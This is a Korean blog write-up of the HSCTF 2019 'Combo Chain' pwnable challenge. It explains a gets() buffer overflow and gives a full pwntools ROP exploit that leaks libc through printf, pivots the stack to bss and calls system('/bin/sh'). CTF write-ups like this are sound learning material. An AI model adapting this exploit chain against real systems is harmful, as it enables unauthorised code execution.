| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 | 31 |
Tags
- 브루트 포스
- 이진트리
- OOB
- 동적 계획법
- 이분 탐색
- DFS
- fsb
- 포맷스트링버그
- 문자열 처리
- 투 포인터
- heap
- 연결리스트
- 수학
- off by one
- 완전 탐색
- House of Orange
- tcache
- BOF
- ROP
- syscall
- 큐
- 스택
- 에라토스테네스의 체
- 이진 탐색
- 스위핑 알고리즘
- 분할 정복
- 백트래킹
- 다이나믹 프로그래밍
- RTL
- BFS
Archives
- Today
- Total
SDJ( 수돈재 아님 ㅎ )
HSCTF 2019 - Combo Chain 본문
64bit 바이너리에 NX만 활성화 되어있다.
Lite와 달리 system의 주소는 주어지지 않고 /bin/sh문자열만 존재한다.
이때 gets(&v1);에서 bof가 발생하므로 ROP를 통해 system주소를 구하고 쉘을 따면 된다.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
from pwn import *
p = process('./combo-chain')
bin_sh = 0x0000000000402008 + len('Dude you hear about that new game called ')
gets_leave_ret = 0x401190
pop_rdi = 0x401263
pop_rsi = 0x401261
leave_ret = 0x4011a2
ret = 0x40101a
bss = 0x0000000000404050 + 0x500
gets_got = 0x404030
gets_plt = 0x401060
printf_plt = 0x401050
gets_system_offset = 170480
pay = ''
pay += 'a'*0x8
pay += p64(bss+0x8)
pay += p64(pop_rdi) + p64(gets_got)
pay += p64(ret) #xmmword
pay += p64(printf_plt)
pay += p64(gets_leave_ret)
p.sendline(pay)
p.recvuntil('CARNAGE!: ')
libc_gets = u64(p.recv(6).ljust(8,'\x00'))
libc_system = libc_gets - gets_system_offset
print "libc_gets : " + hex(libc_gets)
print "libc_system : " + hex(libc_system)
pay = ''
pay += 'a'*0x8
pay += p64(bss)
pay += p64(pop_rdi) + p64(bin_sh)
pay += p64(libc_system)
pay += p64(leave_ret)
p.sendline(pay)
p.interactive()
|
'write-up > pwnable' 카테고리의 다른 글
| NACTF 2019 - BufferOverflow #0 (0) | 2019.09.23 |
|---|---|
| HSCTF 2019 - Storytime (0) | 2019.09.16 |
| HSCTF 2019 - Combo Chain Lite (0) | 2019.09.16 |
| HSCTF 2019 - Return to Sender (0) | 2019.09.16 |
| DefCamp CTF Qualification 2019 - secret (0) | 2019.09.14 |
'write-up/pwnable' Related Articles
more
Comments